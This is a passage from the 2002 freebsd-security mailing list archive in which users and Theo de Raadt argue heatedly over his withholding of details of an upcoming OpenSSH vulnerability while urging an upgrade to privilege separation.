Vidrine" , freebsd-security@FreeBSD.ORG Subject: Re: Hogwash Message-ID: <20020625041946.GA6840@edgemaster.zombie.org> References: <20020625032927.GA6579@edgemaster.zombie.org> <200206250332.g5P3WQLJ024062@cvs.openbsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200206250332.g5P3WQLJ024062@cvs.openbsd.org> User-Agent: Mutt/1.5.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, Jun 24, 2002 at 09:32:26PM -0600, Theo de Raadt wrote: > This one is clearly different. We have a tool which can avoid people being > holed, without having to publish a patch. What percentage of people? As it has already been said, FreeBSD-STABLE still uses OpenSSH 2.9. The privsep features do not exist in this version, and you've not clarified whether this exploit will affect this version as well. All you've said is that everybody should upgrade now or turn it off. Neither of those options are that entirely helpful for a lot of us out here. > If you don't understand that, please go back and study the situation more. I've read your BUGTRAQ post and all your posts to this list. I don't think I'm missing anyting important about the situation. If you don't understand my position, I suggest you go back and study it some more. I'm sure there are several people in the production world that will be happy to explain to you why neither of your options (upgrade or turn it off) are good ones. Maybe you could be learning about this instead of manning your e-mail client all day responding to messages like this one? > By holding this information back for a few more days, we are > permitting a very important protocol to be upgraded in an immune way, > OR YOU CAN TURN IT OFF NOW. I recall there being a root exploit in the BSD telnetd almost a year ago. That bug affected such vendors as HP, Sun, NetBSD, IBM, FreeBSD, Cray, ... I don't remember such a big issue made out of it. I'd also wager that telnetd is used as much or more than ssh. You also failed to address my questions and concerns about the newness of the privsep features. It seems to me that you are using that as a crutch, or "security through obscurity". The fact(?) remains that there is an exploit. Granted you won't tell us anything about it, but it seems to me that you should focus more on fixing the broken code than advocating some new feature in the cutting edge version of OpenSSH. I've read in several places that the privsep version of OpenSSH has many PAM issues, which is an even greater reason not to upgrade. I reiterate, instead of using this time as a soapbox to get people to help you test and perfect privsep you should be fixing the known bugs. If I wanted to be using new stuff, I'd be running FreeBSD-CURRENT. > > On Mon, Jun 24, 2002 at 08:03:08PM -0600, Theo de Raadt wrote: > > > I'm not giving away any hints. Assume the worst and do the upgrade, > > > and if you dislike the way I handled this, don't buy me that beer > > > later. > > > > I'm just curious when this OpenBSD policy change took effect. According to > > http://www.openbsd.org/security.html#disclosure: > > > > Full Disclosure > > Like many readers of the BUGTRAQ mailing list, we believe in > > full disclosure of security problems. In the operating system > > arena, we were probably the first to embrace the concept. Many > > vendors, even of free software, still try to hide issues from > > their users. > > > > Security information moves very fast in cracker circles. On the > > other hand, our experience is that coding and releasing of > > proper security fixes typically requires about an hour of work > > -- very fast fix turnaround is possible. Thus we think that > > full disclosure helps the people who really care about > > security. > > > > Not all of us are in the position to use cutting edge OpenSSH-portable > > versions. By you holding back this information, you are only hurting those > > who *CAN'T* upgrade to your latest and greatest. Has there actually been > > enough testing of privsep to say that it contains no bugs? It seems to me > > that we'd all be better off if you just released a diff and let us all fix > > our own wounds. > > > > -- > > Sean Kelly | PGP KeyID: 77042C7B > > smkelly@zombie.org | http://www.zombie.org -- Sean Kelly | PGP KeyID: 77042C7B smkelly@zombie.org | http://www.zombie.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 21:23: 1 2002 Delivered-To: freebsd-security@freebsd.org Received: from CPE0004761ac738-CM00109515bc65.cpe.net.cable.rogers.com (CPE0004761ac738-CM00109515bc65.cpe.net.cable.rogers.com [24.103.39.131]) by hub.freebsd.org (Postfix) with SMTP id ADF9437B400 for ; Mon, 24 Jun 2002 21:22:54 -0700 (PDT) Received: (qmail 77141 invoked by uid 1001); 25 Jun 2002 04:23:13 -0000 Date: Tue, 25 Jun 2002 00:23:13 -0400 From: Miroslav Pendev To: security@freebsd.org Subject: The good old telnet... Message-ID: <20020625042313.GA75674@CPE0004761ac738-CM00109515bc65.cpe.net.cable.rogers.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline X-Divine-Shadow-Zone: Beware of Lexxx! X-Operating-System: FreeBSD 4.6 User-Agent: Mutt/1.5.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi All! The discussion for SSH is ... Oh Boy!!! :-> Thank you guys from _core_ for your opinion! I think it is the right! I am nobody to 'think' 'bout that, but... anyway... It is NOT good all UNIX OS-es to depend on just one [OpenSSH] 'team'!!! The SSH is is pretty much on every server in the NET, this team have 'The Power' ... to rules... in case like this. ;-/ And I do not think this is gonna be the latest ssh 'bug', because it is very attractive target (together with Apache) I would rather get back to the good old telnet, than waiting for someone to log in - even with non-privileged user (as Theo said even with privsep). Which is the worst - clear text pass going around Internet with milions of POP3 clear text passwords or "c'mon in...? Please, do not missunderstand me, I would like to use SSH instead of telnet, but... I am FreeBSD user and I trust in FreeBSD core team, not somebody else... until the 'patch' is released *when the moon is in capricorn* telnet may not be such a bad idea ;-) --Miro To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 21:23:50 2002 Delivered-To: freebsd-security@freebsd.org Received: from cvs.openbsd.org (cvs.openbsd.org [199.185.137.3]) by hub.freebsd.org (Postfix) with ESMTP id 4E73F37B425; Mon, 24 Jun 2002 21:23:22 -0700 (PDT) Received: from cvs.openbsd.org (deraadt@localhost [127.0.0.1]) by cvs.openbsd.org (8.12.4/8.12.1) with ESMTP id g5P4O5LJ001600; Mon, 24 Jun 2002 22:24:05 -0600 (MDT) Message-Id: <200206250424.g5P4O5LJ001600@cvs.openbsd.org> To: Sean Kelly Cc: Ted Cabeen , "Jacques A. Vidrine" , freebsd-security@FreeBSD.ORG Subject: Re: Hogwash In-reply-to: Your message of "Mon, 24 Jun 2002 23:19:46 CDT." <20020625041946.GA6840@edgemaster.zombie.org> Date: Mon, 24 Jun 2002 22:24:05 -0600 From: Theo de Raadt Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Some of you guys are saying you won't upgrade to privsep as in 3.3 or 3.3.1 from now until Monday, and you won't turn sshd off either. When come Monday you will have a real patch, and can sink back to your old code if you want to, without privsep. And you expect my sympathy, and a change in policy. Spoiled spoiled children. No candy for a week. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 21:26: 6 2002 Delivered-To: freebsd-security@freebsd.org Received: from zephir.primus.ca (mail.tor.primus.ca [216.254.136.21]) by hub.freebsd.org (Postfix) with ESMTP id A420637B401; Mon, 24 Jun 2002 21:25:59 -0700 (PDT) Received: from dialin-142-217.hamilton.primus.ca ([209.90.142.217]) by zephir.primus.ca with esmtp (Exim 3.33 #16) id 17Mhtp-00075W-0A; Tue, 25 Jun 2002 00:25:53 -0400 Date: Tue, 25 Jun 2002 00:25:47 -0400 (EDT) From: Jason Hunt X-X-Sender: leth@lethargic.dyndns.org To: freebsd-security@FreeBSD.ORG Cc: Theo de Raadt , Sean Kelly , Ted Cabeen , "Jacques A. Vidrine" Subject: Re: Hogwash In-Reply-To: <200206250332.g5P3WQLJ024062@cvs.openbsd.org> Message-ID: <20020625000308.S61629-100000@lethargic.dyndns.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, 24 Jun 2002, Theo de Raadt wrote: > This one is clearly different. We have a tool which can avoid people being > holed, without having to publish a patch. > > If you don't understand that, please go back and study the situation more. > > By holding this information back for a few more days, we are > permitting a very important protocol to be upgraded in an immune way, > OR YOU CAN TURN IT OFF NOW. > By "tool", you mean a workaround, correct? Does this exception to full disclosures include all rootable exploits? Is it to be implied that a full disclosure becomes a reality once a patch is available? I for one respect what Theo does, but this whole thing seems kind of hypocritical. Then again, everyone is once in a while. So be it. Also, this talk of a trojan horse or whatever sounds like "hogwash". From what I've seen, I think people are getting "scared" into upgrading and using privsep. That's not necessarily a bad thing, it just seems kind of silly that people have to be scared in order to take security seriously. My two cents. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 21:37: 0 2002 Delivered-To: freebsd-security@freebsd.org Received: from clink.schulte.org (clink.schulte.org [209.134.156.193]) by hub.freebsd.org (Postfix) with ESMTP id 41A4337B401; Mon, 24 Jun 2002 21:36:56 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by clink.schulte.org (Postfix) with ESMTP id 165D824412; Mon, 24 Jun 2002 23:36:55 -0500 (CDT) Received: from tandist.nospam.schulte.org (void.schulte.org [209.134.156.217]) by clink.schulte.org (Postfix) with ESMTP id 60F21243CF; Mon, 24 Jun 2002 23:36:53 -0500 (CDT) Message-Id: <5.1.1.6.2.20020624232702.02b4ad08@pop3s.schulte.org> X-Sender: X-Mailer: QUALCOMM Windows Eudora Version 5.1.1 Date: Mon, 24 Jun 2002 23:37:02 -0500 To: Theo de Raadt , Sean Kelly From: Christopher Schulte Subject: Re: Hogwash Cc: Ted Cabeen , "Jacques A. Vidrine" , freebsd-security@FreeBSD.ORG In-Reply-To: <200206250424.g5P4O5LJ001600@cvs.openbsd.org> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: by AMaViS 0.3.12pre6 on clink.schulte.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 10:24 PM 6/24/2002 -0600, Theo de Raadt wrote: >Spoiled spoiled children. No candy for a week. At least we don't have to put up with this unprofessional and demeaning attitude from Theo very often. He'll soon move back to other groups and abuse his users elsewhere. Quality product or not: Theo, many of the comments in your messages are neither called for nor unwelcome here. Be advised. -- Christopher Schulte http://www.schulte.org/ Do not un-munge my @nospam.schulte.org email address. This address is valid. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 21:43:49 2002 Delivered-To: freebsd-security@freebsd.org Received: from patrocles.silby.com (d127.as20.nwbl0.wi.voyager.net [169.207.139.129]) by hub.freebsd.org (Postfix) with ESMTP id 952A937B401; Mon, 24 Jun 2002 21:43:44 -0700 (PDT) Received: from patrocles.silby.com (localhost [127.0.0.1]) by patrocles.silby.com (8.12.4/8.12.4) with ESMTP id g5P4jtcv056103; Mon, 24 Jun 2002 23:45:55 -0500 (CDT) (envelope-from silby@silby.com) Received: from localhost (silby@localhost) by patrocles.silby.com (8.12.4/8.12.4/Submit) with ESMTP id g5P4jPGt056100; Mon, 24 Jun 2002 23:45:32 -0500 (CDT) X-Authentication-Warning: patrocles.silby.com: silby owned process doing -bs Date: Mon, 24 Jun 2002 23:45:25 -0500 (CDT) From: Mike Silbersack To: Sean Kelly Cc: Theo de Raadt , Ted Cabeen , "Jacques A. Vidrine" , Subject: Re: Hogwash In-Reply-To: <20020625041946.GA6840@edgemaster.zombie.org> Message-ID: <20020624233910.V55382-100000@patrocles.silby.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, 24 Jun 2002, Sean Kelly wrote: > What percentage of people? As it has already been said, FreeBSD-STABLE > still uses OpenSSH 2.9. The privsep features do not exist in this version, > and you've not clarified whether this exploit will affect this version as > well. All you've said is that everybody should upgrade now or turn it off. > Neither of those options are that entirely helpful for a lot of us out here. I think this thread needs to die very soon. Theo's solution to this bug is unorthodox, but it should serve to protect those who are willing to upgrade. He does not deserve all the bashing you're giving him. Theo did miss one possible solution, though: Buy ssh.com's ssh server. If you find that you're not getting your $0 worth out of OpenSSH, you're more than welcome to choose an alternate vendor. In any case, this argument has no place on the FreeBSD security list; DES is working on getting Priv Seperation working as we speak, and you'll be able to upgrade in a day or two. Please end this. Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 21:43:47 2002 Delivered-To: freebsd-security@freebsd.org Received: from beppo.feral.com (beppo.feral.com [192.67.166.79]) by hub.freebsd.org (Postfix) with ESMTP id 51FFE37B400; Mon, 24 Jun 2002 21:43:36 -0700 (PDT) Received: from mailhost.feral.com (mjacob@mailhost.feral.com [192.67.166.1]) by beppo.feral.com (8.11.3/8.11.3) with ESMTP id g5P4hZO86770; Mon, 24 Jun 2002 21:43:35 -0700 (PDT) (envelope-from mjacob@feral.com) Date: Mon, 24 Jun 2002 21:43:35 -0700 (PDT) From: Matthew Jacob X-Sender: mjacob@beppo Reply-To: mjacob@feral.com To: rwatson@freebsd.org Cc: security@freebsd.org Subject: Upcoming OpenSSH vulnerability (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Despite DES's claim that Theo is too hard to work with, perhaps somebody who understands the issues could see where FreeBSD stands wrt this. ---------- Forwarded message ---------- Date: Mon, 24 Jun 2002 15:00:10 -0600 From: Theo de Raadt To: bugtraq@securityfocus.com Cc: dsi@iss.net, announce@openbsd.org, misc@openbsd.org Subject: Upcoming OpenSSH vulnerability There is an upcoming OpenSSH vulnerability that we're working on with ISS. Details will be published early next week. However, I can say that when OpenSSH's sshd(8) is running with priv seperation, the bug cannot be exploited. OpenSSH 3.3p was released a few days ago, with various improvements but in particular, it significantly improves the Linux and Solaris support for priv sep. However, it is not yet perfect. Compression is disabled on some systems, and the many varieties of PAM are causing major headaches. However, everyone should update to OpenSSH 3.3 immediately, and enable priv seperation in their ssh daemons, by setting this in your /etc/ssh/sshd_config file: UsePrivilegeSeparation yes Depending on what your system is, privsep may break some ssh functionality. However, with privsep turned on, you are immune from at least one remote hole. Understand? 3.3 does not contain a fix for this upcoming bug. If priv seperation does not work on your operating system, you need to work with your vendor so that we get patches to make it work on your system. Our developers are swamped enough without trying to support the myriad of PAM and other issues which exist in various systems. You must call on your vendors to help us. Basically, OpenSSH sshd(8) is something like 27000 lines of code. A lot of that runs as root. But when UsePrivilegeSeparation is enabled, the daemon splits into two parts. A part containing about 2500 lines of code remains as root, and the rest of the code is shoved into a chroot-jail without any privs. This makes the daemon less vulnerable to attack. We've been trying to warn vendors about 3.3 and the need for privsep, but they really have not heeded our call for assistance. They have basically ignored us. Some, like Alan Cox, even went further stating that privsep was not being worked on because "Nobody provided any info which proves the problem, and many people dont trust you theo" and suggested I "might be feeding everyone a trojan" (I think I'll publish that letter -- it is just so funny). HP's representative was downright rude, but that is OK because Compaq is retiring him. Except for Solar Designer, I think none of them has helped the OpenSSH portable developers make privsep work better on their systems. Apparently Solar Designer is the only person who understands the need for this stuff. So, if vendors would JUMP and get it working better, and send us patches IMMEDIATELY, we can perhaps make a 3.3.1p release on Friday which supports these systems better. So send patches by Thursday night please. Then on Tuesday or Wednesday the complete bug report with patches (and exploits soon after I am sure) will hit BUGTRAQ. Let me repeat: even if the bug exists in a privsep'd sshd, it is not exploitable. Clearly we cannot yet publish what the bug is, or provide anyone with the real patch, but we can try to get maximum deployement of privsep, and therefore make it hurt less when the problem is published. So please push your vendor to get us maximally working privsep patches as soon as possible! We've given most vendors since Friday last week until Thursday to get privsep working well for you so that when the announcement comes out next week their customers are immunized. That is nearly a full week (but they have already wasted a weekend and a Monday). Really I think this is the best we can hope to do (this thing will eventually leak, at which point the details will be published). Customers can judge their vendors by how they respond to this issue. OpenBSD and NetBSD users should also update to OpenSSH 3.3 right away. On OpenBSD privsep works flawlessly, and I have reports that is also true on NetBSD. All other systems appear to have minor or major weaknesses when this code is running. (securityfocus postmaster; please post this through immediately, since i have bcc'd over 30 other places..) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 21:46:30 2002 Delivered-To: freebsd-security@freebsd.org Received: from clink.schulte.org (clink.schulte.org [209.134.156.193]) by hub.freebsd.org (Postfix) with ESMTP id B5F3F37B403; Mon, 24 Jun 2002 21:46:23 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by clink.schulte.org (Postfix) with ESMTP id C6ACC24412; Mon, 24 Jun 2002 23:46:22 -0500 (CDT) Received: from tandist.nospam.schulte.org (void.schulte.org [209.134.156.217]) by clink.schulte.org (Postfix) with ESMTP id 1E235243CF; Mon, 24 Jun 2002 23:46:21 -0500 (CDT) Message-Id: <5.1.1.6.2.20020624234448.032e9a08@pop3s.schulte.org> X-Sender: X-Mailer: QUALCOMM Windows Eudora Version 5.1.1 Date: Mon, 24 Jun 2002 23:46:30 -0500 To: Christopher Schulte , Theo de Raadt , Sean Kelly From: Christopher Schulte Subject: Re: Hogwash Cc: Ted Cabeen , "Jacques A. Vidrine" , freebsd-security@FreeBSD.ORG In-Reply-To: <5.1.1.6.2.20020624232702.02b4ad08@pop3s.schulte.org> References: <200206250424.g5P4O5LJ001600@cvs.openbsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: by AMaViS 0.3.12pre6 on clink.schulte.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 11:37 PM 6/24/2002 -0500, I wrote: >Quality product or not: Theo, many of the comments in your messages are >neither called for nor unwelcome here. Be advised. Of course, that should have read 'are neither called for nor welcome here.' Apologies from my sleepy side. :-) -- Christopher Schulte http://www.schulte.org/ Do not un-munge my @nospam.schulte.org email address. This address is valid. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 21:49:25 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.interchange.ca (ns.interchange.ca [216.126.79.2]) by hub.freebsd.org (Postfix) with ESMTP id 7204137B401 for ; Mon, 24 Jun 2002 21:49:19 -0700 (PDT) Received: by mail.interchange.ca (Fastmailer, from userid 555) id 56B1B2D83; Tue, 25 Jun 2002 00:49:11 -0400 (EDT) MIME-Version: 1.0 Message-Id: <3D17F647.000045.31912@ns.interchange.ca> Content-Type: Multipart/Mixed; boundary="------------Boundary-00=_Z1W8O2D1VX7NTT4D7TH0" To: security@FreeBSD.ORG Subject: Re: Upcoming OpenSSH vulnerability From: "Michael Richards" X-Fastmail-IP: [24.43.130.241] Received: from 24.43.130.241 by www.fastmail.ca with HTTP; Tue, 25 Jun 2002 04:49:11 +0000 (UTC) Date: Tue, 25 Jun 2002 00:49:11 -0400 (EDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --------------Boundary-00=_Z1W8O2D1VX7NTT4D7TH0 Content-Type: Text/Plain Content-Transfer-Encoding: 7bit Does anyone feel like they're being held over a barrel and forced to take something being told that it's good for them? Perhaps this new privledge separation thing is good but since it seems to be really new and neither well tested nor well integrated into any of the OSes it seems like something I'd rather not be taking uninformed. After reviewing the code of the new 3.3.1p I've located a very simple yet obscure root exploit for this new version that everyone is blindly rushing to install because someone says there is a hole in the old one. Everyone is being rushed because someone wants to break into all the systems and install OpenBSD on them while we're asleep. I'm not going to tell anyone about this new exploit because then someone _else_ will probably fix it. Pretty silly huh? Maybe we should turn the internet off until the end of the week so all the sysadmins can patch their stuff. As someone else suggested, if this secret patch is really so important to keep crackers from coming up with their own exploits, why not just compile a bunch of binaries and distribute them. I'd be more thank happy to donate some CPU time toward this cause. Having said this, at some point source will have to be made public that fixes this bug. Or is the issue more than only one individual knows about it and as a result there is one person working to patch it? -Michael _________________________________________________________________ http://fastmail.ca/ - Fast Secure Web Email for Canadians --------------Boundary-00=_Z1W8O2D1VX7NTT4D7TH0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 21:51:30 2002 Delivered-To: freebsd-security@freebsd.org Received: from postoffice.aims.com.au (eth0.lnk.aims.com.au [203.31.73.253]) by hub.freebsd.org (Postfix) with ESMTP id 6EBFE37B41E for ; Mon, 24 Jun 2002 21:50:55 -0700 (PDT) Received: from postoffice.aims.com.au (nts-ts1.aims.private [192.168.10.2]) by postoffice.aims.com.au with ESMTP id g5P4oqm65354 for ; Tue, 25 Jun 2002 14:50:52 +1000 (EST) (envelope-from chris@aims.com.au) Received: from ntsts1 by aims.com.au with SMTP (MDaemon.v3.5.3.R) for ; Tue, 25 Jun 2002 14:50:46 +1000 Reply-To: From: "Chris Knight" To: Cc: Subject: RE: Hogwash Date: Tue, 25 Jun 2002 14:50:44 +1000 Message-ID: <005b01c21c03$de2dd360$020aa8c0@aims.private> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2911.0) In-Reply-To: <200206250424.g5P4O5LJ001600@cvs.openbsd.org> X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Importance: Normal X-Return-Path: chris@aims.com.au X-MDaemon-Deliver-To: freebsd-security@freebsd.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Howdy, > -----Original Message----- > From: owner-freebsd-security@FreeBSD.ORG > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Theo de Raadt > Sent: Tuesday, 25 June 2002 14:24 > To: Sean Kelly > Cc: Ted Cabeen; Jacques A. Vidrine; freebsd-security@FreeBSD.ORG > Subject: Re: Hogwash > > > Some of you guys are saying you won't upgrade to privsep as in 3.3 or > 3.3.1 from now until Monday, and you won't turn sshd off either. When > come Monday you will have a real patch, and can sink back to your old > code if you want to, without privsep. And you expect my sympathy, and > a change in policy. > > Spoiled spoiled children. No candy for a week. > Stop being an idiot, Theo. People here have some very valid concerns. There is no guarantee that an upgrade to privsep is going to help, especially when the people expected to get privsep working have no idea what the exploit is. privsep also has the clear disadvantage of not having rigorous testing, unlike most of the openssh codebase. Why don't you CLEARLY state which versions of openssh are going to be vulnerable? At this point in time you are clearly upsetting a lot of people, and also making them unproductive. You have insight into an exploit that by the sounds of it, only a handful of people on the planet have. Instead of taking a professional approach and notifying the ssh user community of which versions are vulnerable and a list of possible actions to take, you are deciding to muddy the waters with little information and telling everyone to upgrade or turn off sshd. Grow up, and handle this issue in a professional manner. Regards, Chris Knight Systems Administrator AIMS Independent Computer Professionals Tel: +61 3 6334 6664 Fax: +61 3 6331 7032 Mob: +61 419 528 795 Web: http://www.aims.com.au To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 21:59:51 2002 Delivered-To: freebsd-security@freebsd.org Received: from sushi.sanyusan.se (h94n2fls31o283.telia.com [217.209.202.94]) by hub.freebsd.org (Postfix) with ESMTP id C0D9437B401 for ; Mon, 24 Jun 2002 21:59:44 -0700 (PDT) Received: from sushi.sanyusan.se (localhost [127.0.0.1]) by sushi.sanyusan.se (8.12.4/8.12.4) with ESMTP id g5P4xVuB009099; Tue, 25 Jun 2002 06:59:31 +0200 (CEST) (envelope-from anders@sushi.sanyusan.se) Received: (from anders@localhost) by sushi.sanyusan.se (8.12.4/8.12.4/Submit) id g5P4xVTZ009098; Tue, 25 Jun 2002 06:59:31 +0200 (CEST) Date: Tue, 25 Jun 2002 06:59:31 +0200 From: Anders Andersson To: Jason DiCioccio Cc: freebsd-security@FreeBSD.ORG Subject: Re: [openssh-unix-announce] Re: Upcoming OpenSSH vulnerability (fwd) Message-ID: <20020625045930.GA8612@sushi.sanyusan.se> References: <20020624181545.C550-100000@cithaeron.argolis.org> <2147483647.1024932146@[192.168.4.154]> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <2147483647.1024932146@[192.168.4.154]> User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, Jun 24, 2002 at 03:22:26PM -0700, Jason DiCioccio wrote: > Then again, isn't apache enabled by default on openbsd? Or just installed > by default? Installed by default since its part of the base OS. -- Anders Andersson UNIX, Networking and Security consultant +46 (0)705 87 53 35 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 22:11: 3 2002 Delivered-To: freebsd-security@freebsd.org Received: from yello.shallow.net (yello.shallow.net [203.18.243.120]) by hub.freebsd.org (Postfix) with ESMTP id 0C16537B401 for ; Mon, 24 Jun 2002 22:10:58 -0700 (PDT) Received: by yello.shallow.net (Postfix, from userid 1001) id 875842A6B; Tue, 25 Jun 2002 15:10:51 +1000 (EST) Date: Tue, 25 Jun 2002 15:10:51 +1000 From: Joshua Goodall To: Theo de Raadt Cc: freebsd-security@FreeBSD.ORG Subject: Re: Hogwash Message-ID: <20020625051051.GA4009@roughtrade.net> References: <200206242327.g5ONRBLI012690@cvs.openbsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200206242327.g5ONRBLI012690@cvs.openbsd.org> User-Agent: Mutt/1.5.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi Theo, Something I would like to know - and I think you can tell us without compromising much - is whether 3.4 will be more than 3.3 + fix for this exploit. This will help those who roll our own packages/maintain large deployments to plan in advance. (i.e. will we need an hour or a day to merge changes?) Joshua On Mon, Jun 24, 2002 at 05:27:11PM -0600, Theo de Raadt wrote: > > Nobody is `in' on the bug. The OpenSSH team has given details to no > > one so far, so we are assured to be blindsided. I'm afraid security > > contacts with various projects and vendors know no more than what was > > said in the bugtraq posting. > > Bullshit. > > You have been told to move up to privsep so that you are immunized by > the time the bug is released. > > If you fail to immunize your users, then the best you can do is tell > them to disable OpenSSH until 3.4 is out early next week with the > bugfix in it. Of course, then the bug will be public. > > I am not nearly naive enough to believe that we can release a patch > for this issue to any vendor, and have it not leak immediately. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 22:35:10 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id 3F06737B401 for ; Mon, 24 Jun 2002 22:35:05 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id XAA13131 for ; Mon, 24 Jun 2002 23:34:53 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020624231924.00db8360@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Mon, 24 Jun 2002 23:34:51 -0600 To: security@freeBSD.ORG From: Brett Glass Subject: Workarounds for OpenSSH problems Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org A few quick questions. Has anyone on the list successfully used privilege separation on the OpenSSH 3.3p that's now in the ports tree? Does it work? Does privilege separation have any negative side effects, such as disabling compression or some forms of authentication? Since I have a lot of systems to cover, is it possible to copy just the SSHD binary of the later version over the one that's installed by default when one installs FreeBSD? (I'd rather do this than mess with installing a port -- especially since many of my production machines don't have the ports collection. It's a disk hog.) If there's a problem with privilege separation or authentication on the 3.3p port, I'd be tempted to use the commercial SSH for awhile. SSH, Inc. allows unlimited non-commercial use or a 30 day free evaluation period for commercial use; by the time it expires, the dust will probably have settled and I can switch back. Or I always have the option of paying SSH, Inc. for a license for the commercial uses and continuing to use the code for non-commercial uses. --Brett Glass To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jun 24 22:46:17 2002 Delivered-To: freebsd-security@freebsd.org Received: from topperwein.dyndns.org (acs-24-154-28-203.zoominternet.net [24.154.28.203]) by hub.freebsd.org (Postfix) with ESMTP id 9F69D37B405 for ; Mon, 24 Jun 2002 22:46:11 -0700 (PDT) Received: from topperwein (topperwein [192.168.168.10]) by topperwein.dyndns.org (8.12.3/8.12.3) with ESMTP id g5P5kALq008637 for ; Tue, 25 Jun 2002 